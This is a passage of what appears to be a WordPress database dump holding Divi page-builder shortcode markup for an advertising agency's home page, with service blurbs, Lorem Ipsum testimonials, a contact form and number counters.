differently.</p>\n</div>\n[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\" width=\"100%\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\" custom_margin=\"||26px|||\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>\n[/et_pb_blurb][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%32%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\" hover_enabled=\"0\" custom_margin=\"||26px|||\"]<p style=\"text-align: center;\"><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\" hover_enabled=\"0\" width=\"98.9%\" custom_margin=\"|||21px||\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-06 21:31:56','2020-07-06 21:31:56','',134,'https://52.66.212.87/2020/07/06/134-revision-v1/',0,'revision','',0),(270,1,'2020-07-07 09:35:57','2020-07-07 09:35:57','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" 